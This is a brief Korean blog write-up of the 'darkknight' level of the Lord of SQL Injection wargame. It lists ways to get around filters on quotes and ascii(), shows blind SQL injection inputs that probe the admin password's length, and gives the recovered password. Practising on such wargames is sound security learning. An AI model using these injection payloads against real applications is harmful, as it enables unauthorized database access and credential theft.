WarGame/Lord of SQL Injection
[LOS] 12. darkknight
HackingPractice
2020. 8. 8. 12:26
'(싱글쿼터) 우회 | "(더블쿼터), `, hex, binary, char() 사용 |
ascii() 우회 | ord() 사용 |
?no=0 or true 입력 시 Hello guest 메시지가 출력되는 것을 알 수 있다.
?no=1 or id like "admin" 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.
?no=1 or length(pw) like 8 입력 시 Hello admin 메시지가 출력되는 것을 알 수 있다.
?no=1 or length(pw) like 9 입력 시 Hello guest가 출력되는 것을 알 수 있다.
?pw=1c62ba6f라는 것을 알 수 있다.